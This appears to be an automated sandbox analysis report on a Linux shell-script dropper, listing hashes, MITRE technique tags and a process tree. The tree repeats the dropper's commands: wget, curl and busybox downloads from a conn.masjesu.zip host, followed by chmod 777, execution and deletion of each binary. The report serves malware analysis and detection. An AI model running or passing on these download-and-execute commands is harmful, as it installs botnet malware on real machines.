cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca

Analysis

max time kernel
102s
max time network
105s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20/11/2024, 03:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
Size

10KB
MD5

d2c747dcc8c9570351230ba8dbcfe974
SHA1

210237a62286eb8633d853b4ac09156a5cfc1efc
SHA256

cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca
SHA512

ba3739d2c3d266c512f813a60c662491711281115ba28b7842c2755e9a5019cd3e72df99d9515a378978b736a6164b04fcfd1145b64d2f249288400bee8f026e
SSDEEP

96:YeOf6zUPjeNO+bLLnLWLHVH1HgXDveOtA83lF4ve5eRemxEIhb3RKcKgKSfHsLeA:6GFRC7hBgXDP9AGYhBgXDR

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
919	chmod
989	chmod
743	chmod
809	chmod
870	chmod
898	chmod
961	chmod
975	chmod
800	chmod
905	chmod
954	chmod
933	chmod
947	chmod
968	chmod
982	chmod
996	chmod
765	chmod
841	chmod
1003	chmod
736	chmod
877	chmod
884	chmod
891	chmod
926	chmod
940	chmod
819	chmod
863	chmod
912	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
782	curl
932	busybox
739	wget
740	curl
986	curl
825	curl
925	busybox
880	wget
923	curl
971	wget
988	busybox
1000	curl
847	wget
874	curl
711	wget
869	busybox
916	curl
993	curl
902	curl
930	curl
951	curl
957	wget
734	busybox
818	busybox
918	busybox
939	busybox
958	curl
992	wget
742	busybox
873	wget
985	wget
729	curl
804	wget
904	busybox
946	busybox
950	wget
965	curl
822	wget
901	wget
867	curl
883	busybox
815	wget
858	curl
808	busybox
862	busybox
866	wget
897	busybox
915	wget
964	wget
796	busybox
806	curl
979	curl
995	busybox
911	busybox
943	wget
972	curl
1002	busybox
835	busybox
887	wget
890	busybox
894	wget
895	curl
937	curl
960	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	curl
File opened for modification	/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	curl
File opened for modification	/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	curl
File opened for modification	/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	curl
File opened for modification	/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	curl
File opened for modification	/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	curl
File opened for modification	/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	curl
File opened for modification	/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	curl
File opened for modification	/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	curl
File opened for modification	/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	curl
File opened for modification	/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	curl
File opened for modification	/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	curl
File opened for modification	/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	curl
File opened for modification	/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	curl
File opened for modification	/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	curl
File opened for modification	/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	curl
File opened for modification	/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	curl
File opened for modification	/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	curl
File opened for modification	/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	curl
File opened for modification	/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	curl
File opened for modification	/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	curl
File opened for modification	/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	curl
File opened for modification	/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	curl
File opened for modification	/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	curl
File opened for modification	/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	curl
File opened for modification	/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	curl
File opened for modification	/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	curl
File opened for modification	/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	curl

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
1⤵
PID:704
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:706
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:711
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:729
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:734
- /bin/chmod
  chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  ./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Executes dropped EXE
  PID:737
- /bin/rm
  rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  PID:738
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - System Network Configuration Discovery
  PID:739
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - System Network Configuration Discovery
  PID:742
- /bin/chmod
  chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  ./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Executes dropped EXE
  PID:744
- /bin/rm
  rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  PID:745
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  PID:746
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  PID:758
- /bin/chmod
  chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - File and Directory Permissions Modification
  PID:765
- /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  ./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Executes dropped EXE
  PID:766
- /bin/rm
  rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  PID:769
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  PID:771
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:782
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - System Network Configuration Discovery
  PID:796
- /bin/chmod
  chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  ./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Executes dropped EXE
  PID:802
- /bin/rm
  rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  PID:803
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - System Network Configuration Discovery
  PID:804
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:806
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - System Network Configuration Discovery
  PID:808
- /bin/chmod
  chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  ./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Executes dropped EXE
  PID:810
- /bin/rm
  rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  PID:814
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - System Network Configuration Discovery
  PID:815
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:816
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - System Network Configuration Discovery
  PID:818
- /bin/chmod
  chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  ./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Executes dropped EXE
  PID:820
- /bin/rm
  rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:821
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - System Network Configuration Discovery
  PID:822
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:825
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - System Network Configuration Discovery
  PID:835
- /bin/chmod
  chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - File and Directory Permissions Modification
  PID:841
- /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  ./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Executes dropped EXE
  PID:842
- /bin/rm
  rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  PID:845
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - System Network Configuration Discovery
  PID:847
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:858
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - System Network Configuration Discovery
  PID:862
- /bin/chmod
  chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  ./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Executes dropped EXE
  PID:864
- /bin/rm
  rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  PID:865
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - System Network Configuration Discovery
  PID:866
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:867
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - System Network Configuration Discovery
  PID:869
- /bin/chmod
  chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  ./DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Executes dropped EXE
  PID:871
- /bin/rm
  rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  PID:872
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - System Network Configuration Discovery
  PID:873
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:874
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:876
- /bin/chmod
  chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  ./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:879
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:880
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:883
- /bin/chmod
  chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  ./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  PID:886
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - System Network Configuration Discovery
  PID:887
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - System Network Configuration Discovery
  PID:890
- /bin/chmod
  chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  ./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  PID:893
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - System Network Configuration Discovery
  PID:894
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - System Network Configuration Discovery
  PID:897
- /bin/chmod
  chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  ./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Executes dropped EXE
  PID:899
- /bin/rm
  rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  PID:900
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - System Network Configuration Discovery
  PID:901
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:902
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - System Network Configuration Discovery
  PID:904
- /bin/chmod
  chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  ./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  PID:907
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  PID:908
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - System Network Configuration Discovery
  PID:911
- /bin/chmod
  chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  ./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  PID:914
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:915
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:916
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:918
- /bin/chmod
  chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  ./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  PID:921
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  PID:922
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - System Network Configuration Discovery
  PID:925
- /bin/chmod
  chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  ./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  PID:928
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  PID:929
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - System Network Configuration Discovery
  PID:932
- /bin/chmod
  chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  ./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  PID:935
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  PID:936
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:937
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - System Network Configuration Discovery
  PID:939
- /bin/chmod
  chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  ./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  PID:942
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - System Network Configuration Discovery
  PID:943
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:944
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - System Network Configuration Discovery
  PID:946
- /bin/chmod
  chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - File and Directory Permissions Modification
  PID:947
- /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  ./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Executes dropped EXE
  PID:948
- /bin/rm
  rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  PID:949
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - System Network Configuration Discovery
  PID:950
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:951
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:953
- /bin/chmod
  chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - File and Directory Permissions Modification
  PID:954
- /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  ./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Executes dropped EXE
  PID:955
- /bin/rm
  rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:956
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - System Network Configuration Discovery
  PID:957
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:958
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - System Network Configuration Discovery
  PID:960
- /bin/chmod
  chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - File and Directory Permissions Modification
  PID:961
